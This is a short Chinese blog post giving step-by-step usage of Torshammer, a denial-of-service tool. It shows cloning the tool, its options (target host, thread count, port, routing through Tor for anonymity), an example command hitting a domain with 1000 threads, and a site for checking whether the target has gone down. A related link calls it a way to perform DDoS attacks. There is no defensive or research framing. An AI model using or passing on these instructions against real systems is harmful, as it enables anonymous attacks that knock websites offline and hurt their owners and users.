美文网首页
Torshammer

Torshammer

作者: 手捧樱花v | 来源:发表于2020-07-13 11:01 被阅读0次
git clone https://github.com/dotfighter/torshammer.git
cd torshammer
python torshammer.py 这里支持python2 

后面需要加的参数
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050 定制攻击
-h|--help Shows this help

python torshammer.py -t abc.com -r 1000 -p 80

isitdownrightnow用于验证是否挂掉

相关文章

  • Torshammer

    后面需要加的参数-t|--target -r|--threads

  • 使用Torshammer执行DDoS攻击

    用的方法很少,声称DDoS或任何类型的网络丢失都是成功的。让我们看一下执行DDoS攻击的方法之一。这种攻击非常强大...

网友评论

      本文标题:Torshammer

      本文链接:https://www.haomeiwen.com/subject/rzqacktx.html